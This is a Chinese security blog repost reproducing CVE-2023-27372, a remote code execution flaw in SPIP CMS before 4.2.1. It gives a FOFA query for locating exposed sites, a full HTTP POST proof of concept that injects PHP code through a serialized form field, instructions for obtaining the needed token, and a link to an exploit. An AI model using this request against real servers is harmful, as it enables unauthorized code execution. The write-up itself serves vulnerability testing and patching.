CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

admin 2024年10月7日23:30:55评论9 views字数 1121阅读3分44秒阅读模式

0x00 团队声明

该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x01 漏洞概述

漏洞编号:CVE-2023-27372

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。

0x02 影响版本

SPIP  < 4.2.1
0x03 漏洞复现
方式一:FOFA语句:app="SPIP"

CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

POC

POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded

page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

这里formulaire_action_args参数需访问路径:/spip.php?page=spip_pass获取,标签为:input,name为:formulaire_action_args

CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

通过上面的代码我们可以清楚的看到我们执行了 phpinfo()函数,执行结果如下。表示我们成功复现了该漏洞。CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

EXP

https://github.com/Pari-Malam/CVE-2023-27372

CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

0x04 整改意见

①建议及时更新至最新版本。

0x05 关注我们

0x06 推荐书籍

CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

扫码购书

CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

原文始发于微信公众号(小白嘿课):CVE-2023-27372 SPIP CMS远程代码执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日23:30:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-27372 SPIP CMS远程代码执行漏洞复现http://cn-sec.com/archives/1938479.html

发表评论

匿名网友 填写信息